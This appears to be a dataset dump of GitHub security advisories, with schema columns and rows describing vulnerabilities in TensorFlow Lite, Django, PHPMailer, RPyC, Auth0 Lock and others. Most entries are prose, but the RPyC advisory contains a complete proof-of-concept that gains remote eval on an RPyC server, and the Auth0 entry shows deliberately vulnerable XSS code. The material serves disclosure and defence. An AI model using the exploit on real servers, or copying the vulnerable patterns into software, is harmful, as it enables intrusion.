ecosystem
stringclasses
14 values
vuln_id
stringlengths
10
19
summary
stringlengths
4
267
details
stringlengths
9
13.5k
aliases
stringlengths
17
144
modified_date
stringdate
2010-05-27 05:47:00
2022-05-10 08:46:52
published_date
stringdate
2005-12-31 05:00:00
2022-05-10 08:46:50
severity
stringclasses
5 values
score
float64
0
10
cwe_id
stringclasses
988 values
refs
stringlengths
30
17.7k
introduced
stringlengths
75
4.26k
GHSA
GHSA-crch-j389-5f84
Heap OOB write in TFLite
### Impact A specially crafted TFLite model could trigger an OOB write on heap in the TFLite implementation of [`ArgMin`/`ArgMax`](https://github.com/tensorflow/tensorflow/blob/102b211d892f3abc14f845a72047809b39cc65ab/tensorflow/lite/kernels/arg_min_max.cc#L52-L59): ```cc TfLiteIntArray* output_dims = TfLiteIntArrayCreate(NumDimensions(input) - 1); int j = 0; for (int i = 0; i < NumDimensions(input); ++i) { if (i != axis_value) { output_dims->data[j] = SizeOfDimension(input, i); ++j; } } ``` If `axis_value` is not a value between 0 and `NumDimensions(input)`, then the condition in the `if` is never true, so code writes past the last valid element of `output_dims->data`. ### Patches We have patched the issue in GitHub commit [c59c37e7b2d563967da813fa50fe20b21f4da683](https://github.com/tensorflow/tensorflow/commit/c59c37e7b2d563967da813fa50fe20b21f4da683). The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ### Attribution This vulnerability has been reported by members of the Aivul Team from Qihoo 360.
{'CVE-2021-29603'}
2021-05-21T14:28:15Z
2021-05-21T14:28:15Z
LOW
2.5
{'CWE-787'}
{'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-crch-j389-5f84', 'https://github.com/advisories/GHSA-crch-j389-5f84', 'https://github.com/tensorflow/tensorflow/commit/c59c37e7b2d563967da813fa50fe20b21f4da683', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29603'}
null
GHSA
GHSA-w267-m9c4-8555
Shopware user session is not logged out if the password is reset via password recovery
### Impact User session is not logged out if the password is reset via password recovery ## Patches Fixed in 6.4.8.1, maintainers recommend updating to the current version 6.4.8.2. You can get the update to 6.4.8.2 regularly via the Auto-Updater or directly via the download overview. https://www.shopware.com/en/download/#shopware-6 ## Workarounds For older versions of 6.1, 6.2, and 6.3, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version. https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659
{'CVE-2022-24744'}
2022-03-18T20:13:01Z
2022-03-10T17:37:43Z
LOW
2.6
{'CWE-613'}
{'https://docs.shopware.com/en/shopware-6-en/security-updates/security-update-02-2022?category=security-updates', 'https://github.com/advisories/GHSA-w267-m9c4-8555', 'https://github.com/shopware/platform/security/advisories/GHSA-w267-m9c4-8555', 'https://nvd.nist.gov/vuln/detail/CVE-2022-24744'}
null
GHSA
GHSA-jxwx-85vp-gvwm
Regular Expression Denial of Service in jquery-validation
The GitHub Security Lab team has identified potential security vulnerabilities in jquery.validation. The project contains one or more regular expressions that are vulnerable to ReDoS (Regular Expression Denial of Service) This issue was discovered and reported by GitHub team member @erik-krogh (Erik Krogh Kristensen).
{'CVE-2021-21252'}
2022-04-19T19:02:41Z
2021-01-13T18:21:54Z
MODERATE
0
{'CWE-400'}
{'https://www.npmjs.com/package/jquery-validation', 'https://github.com/jquery-validation/jquery-validation/commit/5d8f29eef363d043a8fec4eb86d42cadb5fa5f7d', 'https://nvd.nist.gov/vuln/detail/CVE-2021-21252', 'https://security.netapp.com/advisory/ntap-20210219-0005/', 'https://github.com/jquery-validation/jquery-validation/pull/2371', 'https://github.com/jquery-validation/jquery-validation/security/advisories/GHSA-jxwx-85vp-gvwm', 'https://github.com/advisories/GHSA-jxwx-85vp-gvwm'}
null
GHSA
GHSA-gv9j-4w24-q7vx
Improper random number generation in github.com/coredns/coredns
### Impact CoreDNS before 1.6.6 (using go DNS package < 1.1.25) improperly generates random numbers because math/rand is used. The TXID becomes predictable, leading to response forgeries. ### Patches The problem has been fixed in 1.6.6+. ### References - [CVE-2019-19794](https://nvd.nist.gov/vuln/detail/CVE-2019-19794) ### For more information Please consult [our security guide](https://github.com/coredns/coredns/blob/master/.github/SECURITY.md) for more information regarding our security process.
null
2022-03-01T22:49:13Z
2022-03-01T21:03:11Z
MODERATE
0
{'CWE-330'}
{'https://github.com/coredns/coredns/security/advisories/GHSA-gv9j-4w24-q7vx', 'https://github.com/advisories/GHSA-gv9j-4w24-q7vx'}
null
GHSA
GHSA-246w-56m2-5899
Cross-site scripting (XSS) vulnerability in the password reset endpoint
### Impact The password reset endpoint served via Synapse was vulnerable to cross-site scripting (XSS) attacks. The impact depends on the configuration of the domain that Synapse is deployed on, but may allow access to cookies and other browser data, CSRF vulnerabilities, and access to other resources served on the same domain or parent domains. ### Patches This is fixed in #9200. ### Workarounds Depending on the needs and configuration of the homeserver a few options are available: 1. Password resets can be disabled by delegating email to a third-party service (via the `account_threepid_delegates.email` setting) or disabling email (by not configuring the `email` setting). 2. If the homeserver is not configured to use passwords (via the `password_config.enabled` setting) then the affected endpoint can be blocked at a reverse proxy: * `/_synapse/client/password_reset/email/submit_token` 3. The `password_reset_confirmation.html` template can be overridden with a custom template that manually escapes the variables using [JInja2's `escape` filter](https://jinja.palletsprojects.com/en/2.11.x/templates/#escape). See the `email.template_dir` setting.
{'CVE-2021-21332'}
2021-08-31T21:07:24Z
2021-03-26T19:52:54Z
MODERATE
6.9
{'CWE-79'}
{'https://github.com/matrix-org/synapse/security/advisories/GHSA-246w-56m2-5899', 'https://github.com/advisories/GHSA-246w-56m2-5899', 'https://nvd.nist.gov/vuln/detail/CVE-2021-21332', 'https://github.com/matrix-org/synapse/releases/tag/v1.27.0', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TNNAJOZNMVMXM6AS7RFFKB4QLUJ4IFEY/', 'https://github.com/matrix-org/synapse/pull/9200', 'https://github.com/matrix-org/synapse/commit/e54746bdf7d5c831eabe4dcea76a7626f1de73df'}
null
GHSA
GHSA-qf7v-8hj3-4xw7
Improper Verification of Cryptographic Signature in PySAML2
PySAML2 before 5.0.0 does not check that the signature in a SAML document is enveloped and thus signature wrapping is effective, i.e., it is affected by XML Signature Wrapping (XSW). The signature information and the node/object that is signed can be in different places and thus the signature verification will succeed, but the wrong data will be used. This specifically affects the verification of assertion that have been signed.
{'CVE-2020-5390'}
2021-08-25T21:05:17Z
2020-05-06T19:41:29Z
HIGH
7.5
{'CWE-347'}
{'https://github.com/advisories/GHSA-qf7v-8hj3-4xw7', 'https://github.com/IdentityPython/pysaml2/releases', 'https://nvd.nist.gov/vuln/detail/CVE-2020-5390', 'https://pypi.org/project/pysaml2/5.0.0/', 'https://github.com/IdentityPython/pysaml2/commit/5e9d5acbcd8ae45c4e736ac521fd2df5b1c62e25', 'https://github.com/IdentityPython/pysaml2/blob/master/CHANGELOG.md#500-2020-01-13', 'https://github.com/IdentityPython/pysaml2/releases/tag/v5.0.0', 'https://usn.ubuntu.com/4245-1/', 'https://github.com/IdentityPython/pysaml2/commit/f27c7e7a7010f83380566a219fd6a290a00f2b6e', 'https://lists.debian.org/debian-lts-announce/2020/02/msg00025.html', 'https://www.debian.org/security/2020/dsa-4630'}
null
GHSA
GHSA-9r8w-6x8c-6jr9
Moderate severity vulnerability that affects django
In Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5, HTML autoescaping was disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allowed a cross-site scripting attack. This vulnerability shouldn't affect most production sites since you shouldn't run with "DEBUG = True" (which makes this page accessible) in your production settings.
{'CVE-2017-12794'}
2021-09-08T20:55:04Z
2019-01-04T17:50:34Z
MODERATE
6.1
{'CWE-79'}
{'https://www.djangoproject.com/weblog/2017/sep/05/security-releases/', 'https://github.com/advisories/GHSA-9r8w-6x8c-6jr9', 'http://www.securityfocus.com/bid/100643', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12794', 'http://www.securitytracker.com/id/1039264', 'https://usn.ubuntu.com/3559-1/'}
null
GHSA
GHSA-r8j4-96mx-rjcc
Improper Restriction of XML External Entity Reference in skylot/jadx
skylot/jadx prior to 1.3.2 is vulnerable to Improper Restriction of XML External Entities when a user is tricked into exporting a malicious APK file (via the -e option) containing a crafted AndroidManifest.xml / strings.xml to gradle, leading to possible local file disclosure.
{'CVE-2022-0219'}
2022-04-19T19:03:24Z
2022-01-21T18:13:42Z
MODERATE
5.5
{'CWE-611'}
{'https://nvd.nist.gov/vuln/detail/CVE-2022-0219', 'https://github.com/skylot/jadx/commit/d22db30166e7cb369d72be41382bb63ac8b81c52', 'https://huntr.dev/bounties/0d093863-29e8-4dd7-a885-64f76d50bf5e', 'https://github.com/advisories/GHSA-r8j4-96mx-rjcc'}
null
GHSA
GHSA-w2pf-g6r8-pg22
Placeholder property does not indicate HTML capable, could lead to inadvertent abuse
## Overview Auth0 Lock version 11.20.4 and earlier did not properly sanitize the generated HTML code. Customers using the `additionalSignUpFields` customization option to add a checkbox to the sign-up dialog that are passing a `placeholder` property obtained from an untrusted source (e.g. a query parameter) could allow cross-site scripting (XSS) on their signup pages. ## Am I affected? You are affected by this vulnerability if all of the following conditions apply: - You are using Auth0 Lock version 11.20.4 or earlier. - You pass `additionalSignUpFields` as options when initializing Lock which includes a field of type `checkbox` whose `placeholder` value is obtained from an untrusted source. An example of a vulnerable snippet is the following where the `placeholder` value is partially user-controlled by the `name` query parameter: ```javascript <script> var params = new URLSearchParams(window.location.search); var options = { auth: { redirectUrl: 'http://localhost:12345/callback', responseType: 'code', params: { scope: 'openid email', }, }, additionalSignUpFields: [{ name: 'agree', type: 'checkbox', placeholder: "I agree to Terms and Conditions for " + params.get('name'), }], }; var lock = new Auth0Lock('<CLIENT_ID>', '<TENANT_NAME>.auth0.com', options); lock.show({ allowShowPassword: true, initialScreen: 'signUp', }); </script> ``` ## How to fix that? Developers using Auth0’s signin solution Lock need to upgrade to version 11.21.0 or later. Version 11.21.0 introduces two changes: 1. The existing `placeholder` property is now treated as plain text to mitigate the problem. 2. A new `placeholderHTML` property is introduced that indicates the level of control it provides and that it should be only supplied from trusted sources. ## Will this update impact my users? This fix patches the Auth0 Lock widget and may require changes in application code, but it will not impact your users, their current state, or any existing sessions. Developers using the `placeholder` property with HTML content from a trusted source should start using the `placeholderHTML` property to continue providing the same user experience.
{'CVE-2019-20174'}
2021-08-19T16:48:59Z
2020-01-31T17:59:51Z
MODERATE
6.1
{'CWE-79'}
{'https://nvd.nist.gov/vuln/detail/CVE-2019-20174', 'https://github.com/auth0/lock/commit/6c15e5659c21cd814ea119af5c51b61399598dd5', 'https://github.com/advisories/GHSA-w2pf-g6r8-pg22', 'https://auth0.com/docs/security/bulletins/cve-2019-20174', 'https://github.com/auth0/lock/releases/tag/v11.21.0', 'https://github.com/auth0/lock/security/advisories/GHSA-w2pf-g6r8-pg22'}
null
GHSA
GHSA-rg4m-gww5-7p47
Free of uninitialized memory in adtensor
An issue was discovered in the adtensor crate through 0.0.3 for Rust. There is a drop of uninitialized memory via the FromIterator implementation for Vector and Matrix.
{'CVE-2021-29936'}
2021-08-25T20:54:18Z
2021-08-25T20:54:18Z
CRITICAL
9.8
{'CWE-908'}
{'https://rustsec.org/advisories/RUSTSEC-2021-0045.html', 'https://github.com/advisories/GHSA-rg4m-gww5-7p47', 'https://github.com/charles-r-earp/adtensor/issues/4', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29936'}
null
GHSA
GHSA-cg48-9hh2-x6mx
HTML Injection in preact
Versions of `preact` 10.x on prerelease tags alpha and beta prior to 10.0.0-beta.1 are vulnerable to HTML Injection. Due to insufficient input validation the package allows attackers to inject JavaScript objects as virtual-dom nodes, which may lead to Cross-Site Scripting. This requires user input parsed with `JSON.parse()` to be passed directly into JSX without sanitization. ## Recommendation Upgrade to version 10.0.0-beta.1.
null
2021-09-27T20:53:58Z
2020-09-02T18:28:58Z
MODERATE
0
{'CWE-74'}
{'https://www.npmjs.com/advisories/835', 'https://github.com/developit/preact/releases/tag/10.0.0-beta.1', 'https://medium.com/dailyjs/exploiting-script-injection-flaws-in-reactjs-883fb1fe36c1', 'https://github.com/advisories/GHSA-cg48-9hh2-x6mx', 'https://github.com/developit/preact/pull/1528'}
null
GHSA
GHSA-p72p-rjr2-r439
Server-Side Request Forgery in terriajs-server
Versions of `terriajs-server`prior to 2.7.4 are vulnerable to Server-Side Request Forgery (SSRF). If an attacker has access to a server whitelisted by the terriajs-server proxy or if the attacker is able to modify the DNS records of a domain whitelisted by the terriajs-server proxy, the attacker can use the terriajs-server proxy to access any HTTP-accessible resources that are accessible to the server, including private resources in the hosting environment. ## Recommendation Upgrade to version 2.7.4 or later.
null
2021-08-04T20:07:20Z
2019-05-29T20:24:02Z
HIGH
0
{'CWE-918'}
{'https://github.com/advisories/GHSA-p72p-rjr2-r439', 'https://github.com/TerriaJS/terriajs-server/commit/3cbc48475f50a53962f605491d0e60648a29bdf0', 'https://medium.com/terria/security-vulnerability-in-terriajs-server-82c8bf4da0a5', 'https://www.npmjs.com/advisories/768'}
null
GHSA
GHSA-hwqf-gcqm-7353
Header injection in nodemailer
The package nodemailer before 6.6.1 are vulnerable to HTTP Header Injection if unsanitized user input that may contain newlines and carriage returns is passed into an address object.
{'CVE-2021-23400'}
2021-12-10T18:56:57Z
2021-12-10T18:56:57Z
MODERATE
6.3
{'CWE-74'}
{'https://github.com/nodemailer/nodemailer/issues/1289', 'https://github.com/advisories/GHSA-hwqf-gcqm-7353', 'https://snyk.io/vuln/SNYK-JS-NODEMAILER-1296415', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23400', 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1314737', 'https://github.com/nodemailer/nodemailer/commit/7e02648cc8cd863f5085bad3cd09087bccf84b9f'}
null
GHSA
GHSA-76j4-gggq-7rg9
SQLinjection in falcon-plus
Falcon-plus v0.3 was discovered to contain a SQL injection vulnerability via the parameter grpName in /config/service/host.go.
{'CVE-2022-26245'}
2022-04-12T21:59:37Z
2022-03-28T00:00:20Z
CRITICAL
9.8
{'CWE-89'}
{'https://github.com/advisories/GHSA-76j4-gggq-7rg9', 'https://nvd.nist.gov/vuln/detail/CVE-2022-26245', 'https://github.com/open-falcon/falcon-plus/issues/951'}
null
GHSA
GHSA-pj4g-4488-wmxm
Dynamic modification of RPyC service due to missing security check
### Impact Version 4.1.0 of RPyC has a vulnerability that affects custom RPyC services making it susceptible to authenticated remote attacks. ### Patches Git commits between September 2018 and October 2019 and version 4.1.0 are vulnerable. Use a version of RPyC that is not affected. ### Workarounds The commit `d818ecc83a92548994db75a0e9c419c7bce680d6` could be used as a patch to add the missing access check. ### References [CVE-2019-16328](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16328) [RPyC Security Documentation](https://rpyc.readthedocs.io/en/latest/docs/security.html#security) ### For more information If you have any questions or comments about this advisory: * Open an issue using [GitHub](https://github.com/tomerfiliba-org/rpyc) ### Proof of Concept ``` import logging import rpyc import tempfile from subprocess import Popen, PIPE import unittest PORT = 18861 SERVER_SCRIPT = f"""#!/usr/bin/env python import rpyc from rpyc.utils.server import ThreadedServer, ThreadPoolServer from rpyc import SlaveService import rpyc class Foe(object): foo = "bar" class Fee(rpyc.Service): exposed_Fie = Foe def exposed_nop(self): return if __name__ == "__main__": server = ThreadedServer(Fee, port={PORT}, auto_register=False) thd = server.start() """ def setattr_orig(target, attrname, codeobj): setattr(target, attrname, codeobj) def myeval(self=None, cmd="__import__('sys')"): return eval(cmd) def get_code(obj_codetype, func, filename=None, name=None): func_code = func.__code__ arg_names = ['co_argcount', 'co_posonlyargcount', 'co_kwonlyargcount', 'co_nlocals', 'co_stacksize', 'co_flags', 'co_code', 'co_consts', 'co_names', 'co_varnames', 'co_filename', 'co_name', 'co_firstlineno', 'co_lnotab', 'co_freevars', 'co_cellvars'] codetype_args = [getattr(func_code, n) for n in arg_names] if filename: codetype_args[arg_names.index('co_filename')] = filename if name: codetype_args[arg_names.index('co_name')] = name mycode = obj_codetype(*codetype_args) return mycode def _vercmp_gt(ver1, ver2): ver1_gt_ver2 = False for i, v1 in enumerate(ver1): v2 = ver2[i] if v1 > v2: ver1_gt_ver2 = True break elif v1 == v2: continue else: # v1 < v2 break return ver1_gt_ver2 @unittest.skipIf(not _vercmp_gt(rpyc.__version__, (3, 4, 4)), "unaffected version") class Test_InfoDisclosure_Service(unittest.TestCase): @classmethod def setUpClass(cls): cls.logger = logging.getLogger('rpyc') cls.logger.setLevel(logging.DEBUG) # NOTSET only traverses until another level is found, so DEBUG is preferred cls.hscript = tempfile.NamedTemporaryFile() cls.hscript.write(SERVER_SCRIPT.encode()) cls.hscript.flush() while cls.hscript.file.tell() != len(SERVER_SCRIPT): pass cls.server = Popen(["python", cls.hscript.name], stdout=PIPE, stderr=PIPE, text=True) cls.conn = rpyc.connect("localhost", PORT) @classmethod def tearDownClass(cls): cls.conn.close() cls.logger.info(cls.server.stdout.read()) cls.logger.info(cls.server.stderr.read()) cls.server.kill() cls.hscript.close() def netref_getattr(self, netref, attrname): # PoC CWE-358: abuse __cmp__ function that was missing a security check handler = rpyc.core.consts.HANDLE_CMP return self.conn.sync_request(handler, netref, attrname, '__getattribute__') def test_1_modify_nop(self): # create netrefs for builtins and globals that will be used to construct on remote remote_svc_proto = self.netref_getattr(self.conn.root, '_protocol') remote_dispatch = self.netref_getattr(remote_svc_proto, '_dispatch_request') remote_class_globals = self.netref_getattr(remote_dispatch, '__globals__') remote_modules = self.netref_getattr(remote_class_globals['sys'], 'modules') _builtins = remote_modules['builtins'] remote_builtins = {k: self.netref_getattr(_builtins, k) for k in dir(_builtins)} # populate globals for CodeType calls on remote remote_globals = remote_builtins['dict']() for name, netref in remote_builtins.items(): remote_globals[name] = netref for name, netref in self.netref_getattr(remote_modules, 'items')(): remote_globals[name] = netref # create netrefs for types to create remote function malicously remote_types = remote_builtins['__import__']("types") remote_types_CodeType = self.netref_getattr(remote_types, 'CodeType') remote_types_FunctionType = self.netref_getattr(remote_types, 'FunctionType') # remote eval function constructed remote_eval_codeobj = get_code(remote_types_CodeType, myeval, filename='test_code.py', name='__code__') remote_eval = remote_types_FunctionType(remote_eval_codeobj, remote_globals) # PoC CWE-913: modify the exposed_nop of service # by binding various netrefs in this execution frame, they are cached in # the remote address space. setattr and eval functions are cached for the life # of the netrefs in the frame. A consequence of Netref classes inheriting # BaseNetref, each object is cached under_local_objects. So, we are able # to construct arbitrary code using types and builtins. # use the builtin netrefs to modify the service to use the constructed eval func remote_setattr = remote_builtins['setattr'] remote_type = remote_builtins['type'] remote_setattr(remote_type(self.conn.root), 'exposed_nop', remote_eval) # show that nop was replaced by eval to complete the PoC remote_sys = self.conn.root.nop('__import__("sys")') remote_stack = self.conn.root.nop('"".join(__import__("traceback").format_stack())') self.assertEqual(type(remote_sys).__name__, 'builtins.module') self.assertIsInstance(remote_sys, rpyc.core.netref.BaseNetref) self.assertIn('rpyc/utils/server.py', remote_stack) def test_2_new_conn_impacted(self): # demostrate impact and scope of vuln for new connections self.conn.close() self.conn = rpyc.connect("localhost", PORT) # show new conn can still use nop as eval remote_sys = self.conn.root.nop('__import__("sys")') remote_stack = self.conn.root.nop('"".join(__import__("traceback").format_stack())') self.assertEqual(type(remote_sys).__name__, 'builtins.module') self.assertIsInstance(remote_sys, rpyc.core.netref.BaseNetref) self.assertIn('rpyc/utils/server.py', remote_stack) if __name__ == "__main__": unittest.main() ```
{'CVE-2019-16328'}
2022-04-19T19:02:47Z
2021-02-17T19:50:58Z
HIGH
8.5
{'CWE-285'}
{'https://github.com/advisories/GHSA-pj4g-4488-wmxm', 'https://github.com/tomerfiliba-org/rpyc/security/advisories/GHSA-pj4g-4488-wmxm'}
null
GHSA
GHSA-v6rh-hp5x-86rv
Potential bypass of an upstream access control based on URL paths in Django
In Django 2.2 before 2.2.25, 3.1 before 3.1.14, and 3.2 before 3.2.10, HTTP requests for URLs with trailing newlines could bypass upstream access control based on URL paths. This issue has low severity, according to the Django security policy.
{'CVE-2021-44420'}
2022-02-14T22:20:29Z
2021-12-09T19:09:37Z
HIGH
7.3
{'CWE-287'}
{'https://github.com/django/django/commit/d4dcd5b9dd9e462fec8220e33e3e6c822b7e88a6', 'https://docs.djangoproject.com/en/3.2/releases/security/', 'https://security.netapp.com/advisory/ntap-20211229-0006/', 'https://nvd.nist.gov/vuln/detail/CVE-2021-44420', 'https://github.com/advisories/GHSA-v6rh-hp5x-86rv', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/B4SQG2EAF4WCI2SLRL6XRDJ3RPK3ZRDV/', 'https://www.djangoproject.com/weblog/2021/dec/07/security-releases/', 'https://groups.google.com/forum/#!forum/django-announce', 'https://www.openwall.com/lists/oss-security/2021/12/07/1'}
null
GHSA
GHSA-hx3r-jv9q-85jw
Bitcoin Inventory Out-of-Memory Denial-of-Service Attack (CVE-2018-17145)
There was an easily exploitable uncontrolled memory resource consumption denial-of-service vulnerability that existed in the peer-to-peer network code of three implementations of Bitcoin and several alternative chains. For more details please see: https://invdos.net/ For the paper: https://invdos.net/paper/CVE-2018-17145.pdf
{'CVE-2018-17145'}
2021-10-04T21:16:22Z
2020-09-10T19:44:58Z
HIGH
7.5
{'CWE-400'}
{'https://nvd.nist.gov/vuln/detail/CVE-2018-17145', 'https://en.bitcoin.it/wiki/Common_Vulnerabilities_and_Exposures#CVE-2018-17145', 'https://invdos.net', 'https://invdos.net/paper/CVE-2018-17145.pdf', 'https://github.com/advisories/GHSA-hx3r-jv9q-85jw', 'https://github.com/bitcoin/bitcoin/blob/v0.16.2/doc/release-notes.md', 'https://github.com/bcoin-org/bcoin/security/advisories/GHSA-hx3r-jv9q-85jw'}
null
GHSA
GHSA-f884-gm86-cg3q
PrestaShop module ps_facetedsearch might be vulnerable from CVE-2017-9841
### Impact We have identified that some ps_facetedsearch module ZIP archives have been built with phpunit dev dependencies. PHPUnit contains a php script that would allow, on a webserver, an attacker to perform a RCE. This vulnerability impacts - phpunit before 4.8.28 and 5.x before 5.6.3 as reported in [CVE-2017-9841](https://nvd.nist.gov/vuln/detail/CVE-2017-9841) - phpunit >= 5.63 before 7.5.19 and 8.5.1 (this is a newly found vulnerability that is currently being submitted as a CVE after disclosure was provided to phpunit maintainers) ### Patches In the [security patch](https://github.com/PrestaShop/ps_facetedsearch/releases/tag/v3.4.1), we look for the unwanted vendor/phpunit folder and remove it if we find it. This allows users to fix the security issue when upgrading. ### Workarounds Users can also simply remove the unwanted vendor/phpunit folder. ### References https://nvd.nist.gov/vuln/detail/CVE-2017-9841 ### For more information If you have any questions or comments about this advisory, email us at security@prestashop.com
null
2020-01-07T17:20:47Z
2020-01-07T17:20:47Z
HIGH
0
null
{'https://github.com/PrestaShop/ps_facetedsearch/commit/47c4785a21ee3b1734b2d46f044f9659a151feca', 'https://github.com/advisories/GHSA-f884-gm86-cg3q', 'https://github.com/PrestaShop/ps_facetedsearch/security/advisories/GHSA-f884-gm86-cg3q'}
null
GHSA
GHSA-7r79-mrp6-8mhq
Rate limit missing in microweber
Microweber prior to version 1.3 does not rate limit password reset emails.
{'CVE-2022-0777'}
2022-03-10T16:00:57Z
2022-03-02T00:00:19Z
HIGH
7.5
{'CWE-640'}
{'https://huntr.dev/bounties/b36be8cd-544f-42bd-990d-aa1a46df44d7', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0777', 'https://github.com/microweber/microweber/commit/a3944cf9d1d8c41a48297ddc98302934e2511b0f', 'https://github.com/advisories/GHSA-7r79-mrp6-8mhq'}
null
GHSA
GHSA-6xwr-q98w-rvg7
Prototype Pollution in nconf
nconf before 0.11.4. When using the memory engine, it is possible to store a nested JSON representation of the configuration. The .set() function, that is responsible for setting the configuration properties, is vulnerable to Prototype Pollution. By providing a crafted property, it is possible to modify the properties on the Object.prototype.
{'CVE-2022-21803'}
2022-04-22T20:32:07Z
2022-04-13T00:00:30Z
HIGH
7.3
{'CWE-1321'}
{'https://github.com/indexzero/nconf/releases/tag/v0.11.4', 'https://nvd.nist.gov/vuln/detail/CVE-2022-21803', 'https://github.com/advisories/GHSA-6xwr-q98w-rvg7', 'https://github.com/indexzero/nconf/pull/397', 'https://snyk.io/vuln/SNYK-JS-NCONF-2395478'}
null
GHSA
GHSA-fvc6-qjp7-m4g4
Arbitrary file upload in Ghost
An arbitrary file upload vulnerability in the file upload module of Ghost v4.39.0 allows attackers to execute arbitrary code via a crafted SVG file.
{'CVE-2022-27139'}
2022-04-22T20:29:43Z
2022-04-13T00:00:24Z
CRITICAL
9.8
{'CWE-434'}
{'https://nvd.nist.gov/vuln/detail/CVE-2022-27139', 'https://youtu.be/FCqWEvir2wE', 'https://github.com/advisories/GHSA-fvc6-qjp7-m4g4'}
null
GHSA
GHSA-r3j7-x2g5-9gx6
Command injection in samba-client
The samba-client package before 4.0.0 for Node.js allows command injection because of the use of process.exec.
{'CVE-2021-27185'}
2022-05-03T03:44:39Z
2021-02-11T20:47:27Z
CRITICAL
9.8
{'CWE-74', 'CWE-78', 'CWE-77'}
{'https://github.com/eflexsystems/node-samba-client/releases/tag/4.0.0', 'https://github.com/eflexsystems/node-samba-client/commit/5bc3bbad9b8d02243bc861a11ec73f788fbb1235', 'https://nvd.nist.gov/vuln/detail/CVE-2021-27185', 'https://github.com/advisories/GHSA-r3j7-x2g5-9gx6', 'https://security.netapp.com/advisory/ntap-20210319-0002/', 'https://advisory.checkmarx.net/advisory/CX-2021-4302', 'https://www.npmjs.com/package/samba-client'}
null
GHSA
GHSA-4pc3-96mx-wwc8
Remote code execution in PHPMailer
### Impact The `isMail` transport in PHPMailer before 5.2.20 might allow remote attackers to pass extra parameters to the `mail` command and consequently execute arbitrary code by leveraging improper interaction between the `escapeshellarg` function and internal escaping performed in the mail function in PHP. NOTE: this vulnerability exists because of an incorrect fix for CVE-2016-10033. This issue really emphasises that it&#39;s worth avoiding the built-in PHP `mail()` function entirely. ### Patches Fixed in 5.2.20 ### Workarounds Send via SMTP to localhost instead of calling the `mail()` function. ### References https://nvd.nist.gov/vuln/detail/CVE-2016-10045 See also https://nvd.nist.gov/vuln/detail/CVE-2016-10033 ### For more information If you have any questions or comments about this advisory: * Open a private issue in [the PHPMailer project](https://github.com/PHPMailer/PHPMailer)
{'CVE-2016-10045'}
2021-08-19T19:43:37Z
2020-03-05T22:09:14Z
CRITICAL
9.8
{'CWE-77'}
{'https://nvd.nist.gov/vuln/detail/CVE-2016-10045', 'http://www.securityfocus.com/bid/95130', 'http://www.rapid7.com/db/modules/exploit/multi/http/phpmailer_arg_injection', 'http://openwall.com/lists/oss-security/2016/12/28/1', 'http://packetstormsecurity.com/files/140286/PHPMailer-Remote-Code-Execution.html', 'https://www.exploit-db.com/exploits/40969/', 'http://www.securitytracker.com/id/1037533', 'https://github.com/advisories/GHSA-4pc3-96mx-wwc8', 'https://www.exploit-db.com/exploits/42221/', 'https://github.com/PHPMailer/PHPMailer/releases/tag/v5.2.20', 'https://github.com/PHPMailer/PHPMailer/security/advisories/GHSA-4pc3-96mx-wwc8', 'https://developer.joomla.org/security-centre/668-20161205-phpmailer-security-advisory.html', 'https://github.com/PHPMailer/PHPMailer/wiki/About-the-CVE-2016-10033-and-CVE-2016-10045-vulnerabilities', 'http://seclists.org/fulldisclosure/2016/Dec/81', 'https://www.exploit-db.com/exploits/40986/', 'https://github.com/FriendsOfPHP/security-advisories/blob/master/phpmailer/phpmailer/CVE-2016-10045.yaml', 'http://www.securityfocus.com/archive/1/539967/100/0/threaded', 'https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html', 'http://packetstormsecurity.com/files/140350/PHPMailer-Sendmail-Argument-Injection.html'}
null
GHSA
GHSA-cpcr-74q9-74gp
Broken Authentication in Atlassian Connect Spring Boot
Broken Authentication in Atlassian Connect Spring Boot (ACSB) from version 1.1.0 before version 2.1.3. Atlassian Connect Spring Boot is a Java Spring Boot package for building Atlassian Connect apps. Authentication between Atlassian products and the Atlassian Connect Spring Boot app occurs with a server-to-server JWT or a context JWT. Atlassian Connect Spring Boot versions between 1.1.0 - 2.1.2 erroneously accept context JWTs in lifecycle endpoints (such as installation) where only server-to-server JWTs should be accepted, permitting an attacker to send authenticated re-installation events to an app.
{'CVE-2021-26074'}
2022-03-02T21:02:01Z
2021-05-10T15:19:04Z
MODERATE
6.5
{'CWE-287', 'CWE-863'}
{'https://community.developer.atlassian.com/t/action-required-atlassian-connect-vulnerability-allows-bypass-of-app-qsh-verification-via-context-jwts/47072', 'https://nvd.nist.gov/vuln/detail/CVE-2021-26074', 'https://github.com/advisories/GHSA-cpcr-74q9-74gp', 'https://confluence.atlassian.com/pages/viewpage.action?pageId=1051986106'}
null
GHSA
GHSA-xcr3-4qvr-54rh
Cross-site Scripting in Pimcore
Pimcore prior to version 10.4 is vulnerable to stored cross-site scripting in Tooltip.
{'CVE-2022-1351'}
2022-04-22T20:46:45Z
2022-04-15T00:00:45Z
MODERATE
6.8
{'CWE-79'}
{'https://huntr.dev/bounties/c23ae6c2-2e53-4bf5-85b0-e90418476615', 'https://github.com/pimcore/pimcore/commit/8c39a8b8f14dce078b31f61c4da599ca6f8fc7ac', 'https://nvd.nist.gov/vuln/detail/CVE-2022-1351', 'https://github.com/advisories/GHSA-xcr3-4qvr-54rh'}
null
GHSA
GHSA-869j-5855-hjpm
